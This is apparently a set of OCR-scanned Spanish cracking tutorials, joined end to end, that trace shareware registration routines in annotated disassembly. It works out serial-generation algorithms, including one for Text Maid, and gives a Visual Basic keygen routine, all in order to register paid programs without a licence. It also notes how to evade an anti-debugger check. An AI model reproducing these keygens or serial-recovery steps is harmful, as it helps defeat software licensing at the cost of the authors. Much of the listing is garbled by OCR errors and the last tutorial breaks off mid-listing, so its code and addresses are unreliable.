Abrimos el TRW2000 y vamos a cargar el programa, este nos da brinca al momento de cargar el programa, ponemos 
un punto de ruptura en 005636FC, luego con F8 entramos a la call y caemos aquí... 


* Referenced by a CALL at Addresses: 
|:0056110E , :005636FC <= Podemos ver que viene de dos lugares 


:005637F4 55 push ebp 

:005637F5 8BEC mov ebp, esp 

:005637F7 51 push ecx 

:005637F8 B904000000 mov ecx, 00000004 
:005637FD 6A00 push 00000000 
:005637FF 6A00 push 00000000 

:00563801 49 dec ecx 

:00563802 75F9 ¡ne 005637FD 

:00563804 874DFC xchg dword ptr [ebp-04], ecx <= Recibe nuestro serial malo 
:00563807 53 push ebx 

:00563808 56 push esi 


:00563809 894DF8 mov dword ptr [ebp-08], ecx 

:0056380C 8955FC mov dword ptr [ebp-04], edx 

:0056380F 8B45FC mov eax, dword ptr [ebp-04] 

:00563812 ESFSO6FAFF call 00503FOC 

:00563817 8B45F8 mov eax, dword ptr [ebp-08] 

:0056381A ESEDOG6FAFF call 00503F0C 

:0056381F 33C0 xor eax, eax 

:00563821 55 push ebp 

:00563822 681D395600 push 0056391D 

:00563827 64FF30 push dword ptr fs:[eax] 

:0056382A 648920 mov dword ptr fs:[eax], esp 

:0056382D 33DB xor ebx, ebx 

:0056382F 8B45FC mov eax, dword ptr [ebp-04] 

:00563832 E82105FAFF call 00503D58 

:00563837 8B FO mov esi, eax 

:00563839 8B45F8 mov eax, dword ptr [ebp-08] 

:0056383C E81705FAFF call 00503D58 

:00563841 83F80A cmp eax, 0000000A <= Compara nuestro serial igual a 10 
:00563844 0F85B6000000 jne 00563900 

:0056384A 8BC6 mov eax, esi 

:0056384C 85C0 test eax, eax 

:0056384E 7E13 jle 00563863 

:00563850 BA01000000 mov edx, 00000001 

:00563855 8B4DFC mov ecx, dword ptr [ebp-04] <= Nuestro nombre 
:00563858 0FB64C11FF movzx ecx, byte ptr [ecx+edx-01] <= Extrae caracter por caracter 
:0056385D 03D9 add ebx, ecx <= Agregar el valor decimal a EBX 

:0056385F 42 inc edx <= Incrementa EDX en 1 

:00563860 48 dec eax <= Decrece EAX en 1 

:00563861 75F2 ¡ne 00563855 <= Ciclo hasta que termine el nombre 
:00563863 69C3C06A 1200 imul eax, ebx, 0O126ACO0  <=EAX = EBX * 00126AC0 
:00563869 8BD8 mov ebx, eax 

:0056386B 8D45FO0 lea eax, dword ptr [ebp-10] 

:0056386E 50 push eax 

:0056386F 8D55EC lea edx, dword ptr [ebp-14] 

:00563872 8BC3 mov eax, ebx 

:00563874 ESD74AFAFF call 00508350 

:00563879 8B45EC mov eax, dword ptr [ebp-14] <= Muestra el Decimal del pre-serial 
:0056387C B903000000 mov ecx, 00000003 

:00563881 BA01000000 mov edx, 00000001 

:00563886 ESDSO06FAFF call 00503F60 <= Extrae los primeros tres caracteres 
:0056388B FF75FO push [ebp-10] 

:0056388E 8D45E4 lea eax, dword ptr [ebp-1C] 

:00563891 8B55FC mov edx, dword ptr [ebp-04] 

:00563894 8A12 mov dl, byte ptr [edx] 

:00563896 ESESO3FAFF call 00503C80 

:0056389B 8B45E4 mov eax, dword ptr [ebp-1C] 

:0056389E 8D55E8 lea edx, dword ptr [ebp-18] 

:005638A1 E80648FAFF call OOSOSOAC <= Vamos a entrar aqui 


Analizando la llamada que se hace arriba podemos notar que el programa compara la 
primera letra y dependiendo de su valor decimal lo acondiciona para que sea mayúscula 


:005080AC 53 push ebx 

:005080AD 56 push esi 

:005080AE 57 push edi 

:005080AF 8BFA mov edi, edx 
:005080B 1 8BFO mov esi, eax 
:005080B3 8BC6 mov eax, esi 
:005080B5 ES9EBCFFFF call 00503D58 


:005080BA 8BD8 mov ebx, eax 

:005080BC 8BC7 mov eax, edi 

:005080BE 8BD3 mov edx, ebx 

:005080C0 E87FBFFFFF call 00504044 

:005080C5 8BD6 mov edx, esi 

:005080C7 8B37 mov esi, dword ptr [edi] 

:005080C9 85DB test ebx, ebx 

:005080CB 7415 je 0OSO080E2 

:005080CD 8A02 mov al, byte ptr [edx] <= Extrae el primer caracter 
:005080CF 3C61 cmp al, 61 <= Compara que no sea minúsculas 
:005080D1 7206 ¡b 0OS080D9 —<=Si no es minúscula brinca 
:005080D3 3C7A cmp al, 7A <= Compara si es minúscula 
:005080D5 7702 ja 005080D9 — <=8Si es otro caracter brinca y da el mensaje chico-malo 
:005080D7 2C20 sub al, 20 <= Si es minúscula la cambia a mayúscula 
:005080D9 8806 mov byte ptr [esi], al 

:005080DB 42 inc edx 

:005080DC 46 inc esi 

:005080DD 4B dec ebx 

:005080DE 85DB test ebx, ebx 

:005080E0 75EB jne 005080CD 

:005080E2 5F pop edi 

:005080E3 5E pop esi 

:005080E4 5B pop ebx 

:005080E5 C3 ret <= Regresamos a 005638A6 


Regresamos a seguir analizando la manera en que se genera nuestro serial 


:005638A6 FF75E8 push [ebp-18] 

:005638A9 8D45EO0 lea eax, dword ptr [ebp-20] 

:005638AC 50 push eax 

:005638AD 8D55DC lea edx, dword ptr [ebp-24] 

:005638B0 8BC3 mov eax, ebx 

:005638B2 E8994AFAFF call 00508350 

:005638B7 8B45DC mov eax, dword ptr [ebp-24] <= Recibe el pre-serial 
:005638BA B903000000 mov ecx, 00000003 

:005638BF BA04000000 mov edx, 00000004 

:005638C4 EsS9706FAFF call 00503F60 <= Extrae los otros tres caracteres 
:005638C9 FF75EO0 push [ebp-20] 

:005638CC 8D45F4 lea eax, dword ptr [ebp-0C] 

:005638CF BA03000000 mov edx, 00000003 

:005638D4 EsS3FOSFAFF call 00503E18 <= Une los primeros + la letra + los otros caracteres 
:005638D9 8D45F4 lea eax, dword ptr [ebp-0C] 

:005638DC 8B4DF4 mov ecx, dword ptr [ebp-0C] 


* Possible StringData Ref from Code Obj ->"TC3" 


| 

:005638DF BA34395600 mov edx, 00563934 <= Obtiene una variable predefinida por el autor 
:005638E4 E8BBO04FAFF call 00503DA4 <= Une todo transformándolo en TC3??????? 
:005638E9 8B55F4 mov edx, dword ptr [ebp-0C] 

:005638EC 8B45F8 mov eax, dword ptr [ebp-08] <= Podemos ver el serial correcto en EDX 
:005638EF E83048FAFF call 00508124 <= Compara las primeras letras 

:005638F4 85CO0 test eax, eax 

:005638F6 7504 jne 005638FC  <=5SIi no son iguales da el mensaje chico-malo 

:005638F8 B301 mov bl, 01 

:005638FA EBO06 jmp 00563902  <=Si son iguales continua revisando el resto 

:005638FC 33DB xor ebx, ebx 


:00563917 ESEOO1FAFF call 005S03AFC 
:0056391C C3 ret <= Retornamos a dar el mensaje de chico-malo 


Es bastante notable el hecho de que en las Reference String del W32DASM podamos ver un string 
con "Illegal registration name!" y lo siguiente lo vemos aquí... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0056363C(C) 


:005636AB 8B83D8020000 mov eax, dword ptr [ebx+000002D8] 
:005636B1 E89E89FCFF call 0052C054 
:005636B6 8B45FC mov eax, dword ptr [ebp-04] 


* Possible StringData Ref from Code Obj ->"CoKeBoTtLe99" <= :0) Sin comentarios 


:005636B9 BA6C375600 mov edx, 0056376C 

:005636BE E8SASO7FAFF call 00503E68 

:005636C3 7521 jne 005636E6 

:005636C5 6A00 push 00000000 

:005636C7 668B0D7C375600 mov cx, word ptr [0056377C] 
:005636CE B201 mov dl, 01 


* Possible StringData Ref from Code Obj ->"Illegal registration name!" 


:005636D0 B888375600 mov eax, 00563788 

:005636D5 ES6EB3FEFF call 0054EA48 

:005636DA C7833402000002000000 mov dword ptr [ebx+00000234], 00000002 
:005636E4 EB57 ¡mp 0056373D 


Creo que ahora ya puedo formar parte en la lista negra de este autor... ;0) 


Hay un momento en el que yo dejé de seguir traceando pues el programa me saco y me dijo que mi serial no era 
correcto y si se pueden dar cuenta fué al momento de comparar la longitud del serial malo. 


Cómo siempre recordarles que "'Si les gusta el programa paguen por él'' No me hago responsable por el mal uso de 
este tutorial, el fin principal es "Aprender Más". 


Saludos a Karpoff, Profesor_X y a mi buen amigo CaoS ReptantE, por su paciencia para conmigo. Gracias 
nuevamente a tí por haber llegado hasta esta línea. 
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INTRODUCCION 


Debido a la falta de honradez de algunos programadores he desistido en crear este tutorial, por ejemplo, he 
puesto este programa y ustedes al final sacarán sus conclusiones si realmente vale su precio o no, ($14.00) 
por un programa que únicamente lo que hace es extraer unos cuantos caracteres del texto de un correo 
electrónico, bueno, no lo tomen tan apecho este es tan solo mi punto de vista, si ha algunos ofendo disculpen 
pero no entiendo por qué cobrar por una utilería que debiera de ser gratuita. 


Como al principio de colado nos llevaremos el programa My Scribe dentro de nuestros pies... ¡oD 


AL ATAKE 


Antes que nada descargarnos nuestra victima desde su gieb, si ya está, lo instalamos y lo inspeccionamos, nos vamos 
como siempre al Help > About Text Maid... y vemos nuestro querido amigo de siempre... el cuadro de registro de 
nuestra victima... 


Registered to: Unlicensed 
License key: 


Ok ahora ingresamos en el primero nuestro nombre, en mi caso ByTESCRK y de licencia 19772404 (:0D gracias CaoS 
por tu consejo), ahora clic en OK y salta el error... 


Invalid license key for specified email address 


Bueno ahora ya sabemos que es una dirección de correo, clic en Aceptar y colocamos nuestra direccón de correo, en 
mi caso ByTESCRKGiespana.es 


Vamos a desensamblar a nuestra victima y buscamos en las Reference Strings nuestros valores y vemos que caemos 
aqui... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:004015E2(C) 


:0040163B 6A00 push 00000000 
:0040163D 6A30 push 00000030 


* Possible StringData Ref from Data Obj ->"Invalid license key for specified " 
->"email address." 


:0040163F 68C8104100 push 004110C8 <= Aqui caemos 
Vamos con Goto Code Location al punto 004015E2 y vemos que caemos en... 


:004015D5 51 push ecx 

:004015D6 52 push edx 

:004015D7 8D4C2414 lea ecx, dword ptr [esp+14] 

:004015DB E810310000 call 004046F0 <= Aqui vamos a investigar 
:004015E0 85C0 test eax, eax 

:004015E2 7457 je 0040163B_ <= De aqui va al mensaje de error 
:004015E4 8D442404 lea eax, dword ptr [esp+04] 

:004015E8 8D4C2408 lea ecx, dword ptr [esp+08] 

:004015EC 50 push eax 


Vamos a cargar ahora el TRW2000, buscamos nuestra victima y le damos clic a Load y ponemos un punto de ruptura 
en 004015DB (Oj cuando estemos traceando veamos que sea en el archivo textmaid.exe) y al hacer clic en el botón 
OK para registrar (ya que hemos ingresado nuevamente los datos), vemos que caemos en la llamada a 004046F0 y 
entramos con ES... luego seguimos traceando con F10 


:004046F0 8B542404 mov edx, dword ptr [esp+04] 
:004046F4 8D4110 lea eax, dword ptr [ecx+10] 
:004046F7 56 push esi 

:004046F8 50 push eax 

:004046F9 8D44240C lea eax, dword ptr [esp+0C] 
:004046FD 52 push edx 

:004046FE 50 push eax 

:004046FF ES7CD2FFFF call 00401980 <= Entramos aqui... 
:00404704 8B4C240C mov ecx, dword ptr [esp+0C] 
:00404708 8B00 mov eax, dword ptr [eax] 
:0040470A 8B09 mov ecx, dword ptr [ecx] 
:0040470C 51 push ecx 


:0040470D 50 push eax 

:0040470E FF15F0C74000 Call dword ptr [0040C7FO] <= Aqui se compara el serial malo y el bueno 
:00404714 83C408 add esp, 00000008 

:00404717 8D4C2408 lea ecx, dword ptr [esp+08] 

:0040471B 85CO0 test eax, eax 

:0040471D 0F94C2 sete dl 

:00404720 81E2FF000000 and edx, 0OOOO0OFF 

:00404726 8BF2 mov esi, edx 


Al entrar en 00401980 vemos esto... 


:00401980 6AFF push FFFFFFFF 

:00401982 680FA24000 push 0040A20F 

:00401987 64A 100000000 mov eax, dword ptr fs:[00000000] 

:0040198D 50 push eax 

:0040198E 64892500000000 mov dword ptr fs:[00000000], esp 

:00401995 51 push ecx 

:00401996 8B44241C mov eax, dword ptr [esp+1C] 

:0040199A 55 push ebp 

:0040199B 56 push esi 

:0040199C 57 push edi 

:0040199D 8B30 mov esi, dword ptr [eax] 

:0040199F 33C9 xor ecx, ecx 

:004019A1 33C0 xor eax, eax 

:004019A3 C744240C00000000 mov [esp+0C], 00000000 

:004019AB 8B7EF8 mov edi, dword ptr [esi-08] 

:004019AE 85FF test edi, edi 

:004019B0 7E13 jle 004019C5 

:004019B2 OFBE1406 movsx edx, byte ptr [esi+eax] <= Extrae letra por letra de una palabra clave 
:004019B6 8BEA mov ebp, edx <= Mueve el valor en DEC a ebp 

:004019B8 C1E5OS shl ebp, 05 <= Multiplica el valor en DEC por 2, cinco veces 
:004019BB 03E9 add ebp, ecx <= Suma EBP + ECX 

:004019BD 40 inc eax <= Incrementa EAX en uno 

:004019BE 3BC7 cmp eax, edi <= EDI = Longitud de la palabra clave 
:004019C0 8DOC2A lea ecx, dword ptr [edx+ebp]  <=ECX = EDX + EBP 
:004019C3 7CED jl 004019B2 <= Si no es menor regresa a 004019B2 
:004019C5 8B542424 mov edx, dword ptr [esp+24] 

:004019C9 33FF xor edi, edi 

:004019CB 33C0 xor eax, eax 

:004019CD 8B12 mov edx, dword ptr [edx] <= Nuestro email 

:004019CF 8B72F8 mov esi, dword ptr [edx-08] <= Longitud del email 
:004019D2 85F6 test esi, esi 

:004019D4 7E0E jle 004019E4 

:004019D6 OFBE2C02 movsx ebp, byte ptr [edx+eax] <= Extrae letra por letra del email 
:004019DA OFAFE9 imul ebp, ecx <= El valor en DEC de la letra por el resultado anterior 
:004019DD 03FD add edi, ebpp <= Acumula en EDI 

:004019DF 40 inc eax <= Incrementa EAX en uno 

:004019E0 3BC6 cmp eax, esi <= Compara EAX y ESI 

:004019E2 7CF2 j1 004019D6  <=Si no coinciden regresa a finalizar el proceso 
:004019E4 8D4C2428 lea ecx, dword ptr [esp+28] <= Aqui está nuestro serial válido en HEX 
:004019E8 E8F77A0000 Call 004094E4 

:004019ED 57 push edi 

:004019EE 8D44242C lea eax, dword ptr [esp+2C] 

:004019F2 BD01000000 mov ebp, 00000001 


Bueno así damos por terminado nuestro traceo, teniendo nuestro serial en la mano podemos generar nuestro keygen o 
podemos registrar nuestro programa y eso es todo, nuestro serial debemos ingresarlo en el programa en valor 
HEXadecimal. 


Nuestra rutina principal del keygen quedaría así... 


Private Sub Genera(MiNombre As String) 
MiTexto = "Coloqueaquilapalabraclave" 
For I1= 1 To Len(MiTexto) 

EAX = Asc(Mid(MiTexto, I, 1)) 
AX =EAX 
For II = 1 To 5 
EAX = EAX * 2 
Next 
EBX = EBX + EAX 
EBX = EBX + AX 
Next 
For 1= 1 To Len(MiNombre) 
EAX = Asc(Mid(MiNombre, L, 1)) 
ECX = ECX + (EBX * EAX) 
Next 
Text2.Text = LCase(Hex(ECX)) <= Ej el serial correcto debe estar en letras minúsculas 
End Sub 


$2 Text Maid v1.4 E 42 My Scribe v1.5 E xj 
Nombre: [ByTESCRKGiespana.es Nombre: [ByTESCRK 
Código: [2cc?780 Código: [12e67f 


Generar | 


Una vez hayamos generado este podemos, cambiar tambien la palabra clave del programa My Scribe v1.5 de este 
mismo autor y tendremos un serial para registrarnos, pero eso ya les queda a ustedes. Y como siempre... 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de manera 
educacional y tambien como diversión, si ha USTED, le gusta el producto por favor COMPRELO, algunas 
veces... los autores merecen su dinero ;0)" 


Saludos a mis buenos amigos Karpoff, PrOfesor_X, CaoS ReptantE (¡Gracias por tus consejos!) y a todos los crackers 
hispanohablantes, en especial a ti por que has llegado hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRK QGiespana.es 
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INTRODUCCION 


Creo que esto (séptimo tutorial) no hubiese sido posible, sino es por el ánimo que en su oportunidad me diera 
mi buen amigo CaoS ReptantE. 


Este es un programa que me traía pensando desde hace mucho tiempo, CaoS me dijo "el número o el 
algoritmo para calcularlo debe estar necesariamente en el programa", esto debido a que me imaginaba que era 
algo externo del programa. Y por decirlo así ya verán a lo que me refiero. 


Cuando desensamblemos el programa en W32DASM podemos ver en las Reference Strings la cadena 
MASICE esto nos indica que si tenemos el Softlce instalado, el programa no se ejecutará, pero podemos hacer 
uso del FrogSice, para que el programa si se ejecute, puesto que tambien tiene una rutina de CRC-Protection, 
lo que quiere decir que si parchamos el programa salta esta rutina, tambien encontraremos la referencia a otro 
programa MAÁNTICE (aún no lo conozco). 


AL ATAKE 


Empecemos, carguemos el programa aparece una ventanita para registrarnos, hacemos clic en Registrar y aparecen 
nuestros viejos amigos, las cajitas de Nombre de Usuario y de Serial ingresamos nuestros valores 


Nombre de Usuario: ByTESCRK 
Serial: 19970424 


Y nos da el mensajito de error... 


"El nombre de usuario o la clave introducida no son válidos. 
Verifica que los datos que introduces están correctamente 
escritos, tal y como aparecen en la información de registro." 


Cerramos el programa y vamos a desensamblar con W32DASM y buscamos esta cadena en las Reference Strings, al 
hallarla vemos lo siguiente 


:005424EE E9F513ECFF ¡mp 004038E8 
:005424F3 EBES ¡mp 005424DD 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00542450(C) <= Vamos a investigar aqui 


:005424FE5 6A30 push 00000030 


* Possible StringData Ref from Code Obj ->"Error" 


:005424F7 B9C4255400 mov ecx, 005425C4 


* Possible StringData Ref from Code Obj ->"El nombre de usuario o la clave " 
->"introducida no son v" 


:005424FC BACC255400 mov edx, 005425CC <= Caemos aqui 
:00542501 A1E0385900 mov eax, dword ptr [005938E0] 
:00542506 8B00 mov eax, dword ptr [eax] 

:00542508 E8C73FF1FF call 004564D4 


Ahora cargamos el programa TRW2000 y cargamos el programa con LOAD, ponemos un punto de ruptura en 
00542449 (bpx 00542449), Ctrl + N para continuar con la ejecución del programa, nos aparece nuevamente la 
ventanita y volvemos a ingresar nuestros valores y hacemos clic en OK automáticamente salta TRW y caemos en... 


:00542445 8B45F8 mov eax, dword ptr [ebp-08] 

:00542448 59 pop ecx 

:00542449 ESFEF7FFFF call 00541C4C <= Vamos a entrar aqui 
:0054244E 84CO0 test al, al 

:00542450 0F849F000000 je 005424F5 


* Possible StringData Ref from Code Obj ->"SoftwarelSaroviWebScope" 


:00542456 B984255400 mov ecx, 00542584 

:0054245B B201 mov dl, 01 

:0054245D A1DC824500 mov eax, dword ptr [004582DC] 
:00542462 ESE969F1FF call 00458E50 


Al entrar en la llamada encontramos esto... 


:00541C4C 55 push ebp 

:00541C4D 8BEC mov ebp, esp 
:00541C4F 83C4F4 add esp, FFFFFEF4 
:00541C52 53 push ebx 


:00541C53 56 push esi 

:00541C54 33DB xor ebx, ebx 

:00541C56 895DF4 mov dword ptr [ebp-0C], ebx 

:00541C59 894DF8 mov dword ptr [ebp-08], ecx 

:00541C5C 8955FC mov dword ptr [ebp-04], edx 

:00541C5F 8BF0 mov esi, eax 

:00541C61 8B45FC mov eax, dword ptr [ebp-04] 

:00541C64 ES9F26ECFF call 00404308 

:00541C69 8B45F8 mov eax, dword ptr [ebp-08] 

:00541C6C Es9726ECFF call 00404308 

:00541C71 33C0 xor eax, eax 

:00541C73 55 push ebp 

:00541C74 68751D5400 push 00541D75 

:00541C79 64FF30 push dword ptr fs:[eax] 

:00541C7C 648920 mov dword ptr fs:[eax], esp 

:00541C7F 33DB xor ebx, ebx 

:00541C81 8B45FC mov eax, dword ptr [ebp-04] 

:00541C84 ESCB24ECFF call 00404154 <= Cuenta los caracteres del serial 

:00541C89 83F80D cmp eax, 0000000D <= Compara que nuestro serial sea mayor que 13 letras 
:00541C8C 0F8CC8000000 j1 00541D5A <= Si es menor busca la salida y da chicomalo 
:00541C92 8D4608 lea eax, dword ptr [esi+08] 

:00541C95 50 push eax 

:00541C96 B904000000 mov ecx, 00000004 

:00541C9B BA01000000 mov edx, 00000001 

:00541CA0 8B45FC mov eax, dword ptr [ebp-04] 

:00541CA3 E8B426ECFF call 0040435C 

:00541CA8 8D460C lea eax, dword ptr [esi+0C] 

:00541CAB 50 push eax 

:00541CAC B902000000 mov ecx, 00000002 

:00541CB1 BA05000000 mov edx, 00000005 

:00541CB6 8B45FC mov eax, dword ptr [ebp-04] 

:00541CB9 Es9E26ECFF call 0040435C 

:00541CBE 8B45FC mov eax, dword ptr [ebp-04] 

:00541CC1 8A4006 mov al, byte ptr [eax+06] <= Extrae el séptimo caracter 

:00541CC4 25FF000000 and eax, OOOOOOFF 

:00541CC9 83C0CF add eax, FFFFFFCF <= Suma EAX = EAX - 31h 

:00541CCC 83F806 cmp eax, 00000006 <= Compara que el valor esté entre 1 y 6 
:00541CCF 0F8785000000 ja 00541D5A  <=Si el valor resultante no esta entre 1 y 6 sale 
:00541CD5 FF2485DC1C5400 jmp dword ptr [4*eax+00541CDC] <= Va dependiendo del valor 


:00541CF8 C6461000 mov [esi+10], 00. <= Si es cero llega aqui 
:00541CFC EB22 jmp 00541D20 <= Vamos a 00541D20 
:00541CFE C6461001 mov [esi+10], 01  <=Si es uno llega aqui 
:00541D02 EB1C ¡mp 00541D20 

:00541D04 C6461002 mov [esi+10], 02 <= etc. 

:00541D08 EB16 ¡mp 00541D20 

:00541DOA C6461003 mov [esi+10], 03 

:00541DO0E EB10 jmp 00541D20 

:00541D10 C6461004 mov [esi+10], 04 

:00541D14 EBOA ¡mp 00541D20 

:00541D16 C6461005 mov [esi+10], 05 

:00541D1A EB04 ¡mp 00541D20 

:00541D1C C6461006 mov [esi+10], 06 


:00541D20 8D4614 lea eax, dword ptr [esi+14] <= Aqui caemos 
:00541D23 50 push eax 

:00541D24 B905000000 mov ecx, 00000005 

:00541D29 BA08000000 mov edx, 00000008 

:00541D2E 8B45FC mov eax, dword ptr [ebp-04] 


:00541D31 E82626ECFF call 0040435C 

:00541D36 8D4618 lea eax, dword ptr [esi+18] 

:00541D39 8B55F8 mov edx, dword ptr [ebp-08] 

:00541D3C E8E721ECFF call 00403F28 

:00541D41 8D55F4 lea edx, dword ptr [ebp-0C] 

:00541D44 8BC6 mov eax, esi 

:00541D46 E825FEFFFF call 00541B70 <= Calcula el serial, nosotros entramos 
:00541D4B 8B55F4 mov edx, dword ptr [ebp-0C] <= Serial del programa 
:00541D4E 8B45FC mov eax, dword ptr [ebp-04] <= Serial malo 
:00541D51 ES0E25ECFF call 00404264 <= Compara el serial 
:00541D56 7502 ¡ne 00O541D5A  <=Si no son iguales sale y error! 
:00541D58 B301 mov bl, 01 

:00541D5A 33C0 xor eax, eax 

:00541D5C SA pop edx 

:00541D5D 59 pop ecx 

:00541D5E 59 pop ecx 

:00541D5F 648910 mov dword ptr fs:[eax], edx 

:00541D62 687C1D5400 push 00541D7C 

:00541D67 8D45F4 lea eax, dword ptr [ebp-0C] 

:00541D6A BA03000000 mov edx, 00000003 

:00541D6F E88421ECFF call 00403EF8 

:00541D74 C3 ret 


Adentro de la rutina vemos esto... 


:00541B70 55 push ebp 

:00541B71 8BEC mov ebp, esp 

:00541B73 83C4C8 add esp, FFFFFFCS8 

:00541B76 53 push ebx 

:00541B77 56 push esi 

:00541B78 33C9 xor ecx, ecx 

:00541B7A 894DC8 mov dword ptr [ebp-38], ecx 

:00541B7D 8955FC mov dword ptr [ebp-04], edx 

:00541B80 8BD8 mov ebx, eax 

:00541B82 33C0 xor eax, eax 

:00541B84 55 push ebp 

:00541B85 68241C5400 push 00541C24 

:00541B8A 64FF30 push dword ptr fs:[eax] 

:00541B8D 648920 mov dword ptr fs:[eax], esp 

:00541B90 BE01000000 mov esi, 00000001 <=ESTI recibe el valor de 1 
:00541B95 8B4318 mov eax, dword ptr [ebx+18] <= Nuestro nombre 
:00541B98 ESB725ECFF call 00404154 <= Cuenta las letras 
:00541B9D 83F801 cmp eax, 00000001 <= Compara con 1 
:00541BA0 7COF jl 00541BB1  <=8Si es blanco da error 

:00541BA2 8B5318 mov edx, dword ptr [ebx+18] <= Nuestro nombre 
:00541BA5 0FB65402FF movzx edx, byte ptr [edx+eax-01] <= Extrae letra por letra 
:00541BAA 03F2 add esi, edx <= ESI = ESI + EDX (EST trae 1 la primera vez) 
:00541BAC 48 dec eax <= Decrece EAX en 1 

:00541BAD 85CO0 test eax, eax <= Compara 

:00541BAF 75Fl1 jne 00541BA2  <=Si no ha terminado regresa 
:00541BB1 8B45FC mov eax, dword ptr [ebp-04] 

:00541BB4 50 push eax 

:00541BB5 8B4308 mov eax, dword ptr [ebx+08] 

:00541BB8 8945CC mov dword ptr [ebp-34], eax 

:00541BBB C645D00B mov [ebp-30], 0B 

:00541BBF 8B430C mov eax, dword ptr [ebx+0C] 

:00541BC2 8945D4 mov dword ptr [ebp-2C], eax 

:00541BC5 C645D80B mov [ebp-28], 0B 

:00541BC9 8BC3 mov eax, ebx 


:00541BCB ES6CFEFFFEF call 00541A3C 
:00541BD0 8845DC mov byte ptr [ebp-24], al 
:00541BD3 C645E002 mov [ebp-20], 02 
:00541BD7 8B4314 mov eax, dword ptr [ebx+14] 
:00541BDA 8945E4 mov dword ptr [ebp-1C], eax 
:00541BDD C645E80B mov [ebp-18], 0B 
:00541BE1 8975EC mov dword ptr [ebp-14], esi 
:00541BE4 C645F000 mov [ebp-10], 00 
:00541BE8 8D55C8 lea edx, dword ptr [ebp-38] 
:00541BEB 8BC3 mov eax, ebx 

:00541BED ES8EFEFFFF call 00541480 <= Entramos aqui 


Investigamos en la llamada, dentro de la rutina encontramos lo siguiente... 


:00541A80 55 push ebp 

:00541A81 8BEC mov ebp, esp 

:00541A83 83C4D0 add esp, FFFFFFDO 

:00541A86 53 push ebx 

:00541A87 56 push esi 

:00541A88 33C09 xor ecx, ecx 

:00541A8A 894DF8 mov dword ptr [ebp-08], ecx 

:00541A8D 8955FC mov dword ptr [ebp-04], edx 

:00541A90 8BF0 mov esi, eax 

:00541A92 33C0 xor eax, eax 

:00541A94 55 push ebp 

:00541A95 684F1B5400 push 00541B4F 

:00541A9A 64FF30 push dword ptr fs:[eax] 

:00541A9D 648920 mov dword ptr fs:[eax], esp 

:00541AA0 BB01000000 mov ebx, 00000001 <= EBX recibe el valor de 1 
:00541A AS 8B4618 mov eax, dword ptr [esi+18] <= Nuestro nombre 
:00541AA8 EsA726ECFF call 00404154 <= Calcula las letras 
:00541AAD 83F801 cmp eax, 00000001 <= Compara con 1 

:00541AB0 7COF j100541AC1  <=Si es en blanco da error 

:00541AB2 8B5618 mov edx, dword ptr [esi+18] <= Nuestro nombre 
:00541AB5 0FB65402FF movzx edx, byte ptr [edx+eax-01] <= Extrae letra por letra 
:00541ABA 03DA add ebx, edx <= Suma EBX = EBX + EDX (EBX trae 1 en la primera letra) 
:00541ABC 48 dec eax 

:00541ABD 85CO0 test eax, eax 

:00541ABF 75Fl jne 00541AB2  <=Si no ha completado el nombre regresa 
:00541AC1 8D45F8 lea eax, dword ptr [ebp-08] <= Vemos que EBX = 648d 
:00541AC4 50 push eax 

:00541AC5 8B4608 mov eax, dword ptr [esi+08] 

:00541AC8 8945D0 mov dword ptr [ebp-30], eax 

:00541ACB C645D40B mov [ebp-2C], OB 

:00541ACF 8B460C mov eax, dword ptr [esi+0C] 

:00541AD2 8945D8 mov dword ptr [ebp-28], eax 

:00541AD5 C645DCOB mov [ebp-24], 0B 

:00541AD9 8BC6 mov eax, esi 

:00541ADB ES5CFFFFFF call 00541A3C 

:00541AE0 8845E0 mov byte ptr [ebp-20], al 

:00541AE3 C645E402 mov [ebp-1C], 02 

:00541AE7 8B4614 mov eax, dword ptr [esi+14] 

:00541AEA 8945E8 mov dword ptr [ebp-18], eax 

:00541 AED C645ECOB mov [ebp-14], OB 

:00541AF1 895DF0 mov dword ptr [ebp-10], ebx 

:00541 AF4 C645F400 mov [ebp-0C], 00 

:00541AF8 8D55DO0 lea edx, dword ptr [ebp-30] 

:00541 AFB B904000000 mov ecx, 00000004 

:00541B00 B8641B5400 mov eax, 00541B64 


:00541B05 EsD28FECFF call 0O4DAADC 

:00541BOA BB01000000 mov ebx, 00000001 <= EBX recibe 1 

:00541B0F 8B45F8 mov eax, dword ptr [ebp-08] <= Vemos la concatenación 197704241977648 
:00541B 12 E83D26ECFF call 00404154 <= Cuenta la concatenación 

:00541B 17 83F801 cmp eax, 00000001 <= Compara con 1 

:00541B1A 7C0F jl 00541B2B  <=Si es vacio sale 

:00541B1C 8B55F8 mov edx, dword ptr [ebp-08] <= La concatenación 

:00541B1F 0FB65402FF movzx edx, byte ptr [edx+eax-01] <= Extrae caracter por caracter 
:00541B24 03DA add ebx, edx <= Suma EBX = EBX + EDX (EBX trae 1 la primera vez) 
:00541B26 48 dec eax 

:00541B27 85CO0 test eax, eax 

:00541B29 75F1 jne 00541B1C <= Hasta terminar, recibiremos 797d 

:00541B2B 8B55FC mov edx, dword ptr [ebp-04] <= EDX = 5698d 

:00541B2E 0FB74604 movzx eax, word ptr [esi+04] <= EAX = 5698d o 1642h 

:00541B32 03C3 add eax, ebx <= Suma EBX + EAX (5698+795=6495) 

:00541B34 Es7780ECFF call 00409BB0 

:00541B39 33C0 xor eax, eax 

:00541B3B 5A pop edx 

:00541B3C 59 pop ecx 

:00541B3D 59 pop ecx 

:00541B3E 648910 mov dword ptr fs:[eax], edx 

:00541B41 68561B5400 push 00541B56 

:00541B46 8D45F8 lea eax, dword ptr [ebp-08] 

:00541B49 Es8623ECFF call 00403ED4 

:00541B4E C3 ret 


Salimos de la rutina y volvemos a... 


:00541BF2 8B45C8 mov eax, dword ptr [ebp-38] <= Recibe el valor 6495 
:00541BF5 8945F4 mov dword ptr [ebp-0C], eax 

:00541BF8 C645F80B mov [ebp-08], OB 

:00541BFC 8D55CC lea edx, dword ptr [ebp-34] 

:00541BFF B905000000 mov ecx, 00000005 

:00541C04 B83C1C5400 mov eax, 00541C3C 

:00541C09 ESCESEECFF call O0O40AADC <= Concatena los valores 1977042419776486495 
:00541C0E 33C0 xor eax, eax 

:00541C10 SA pop edx 

:00541C11 59 pop ecx 

:00541C12 59 pop ecx 

:00541C13 648910 mov dword ptr fs:[eax], edx 

:00541C16 682B 105400 push 00541C2B 

:00541C1B 8D45C8 lea eax, dword ptr [ebp-38] 

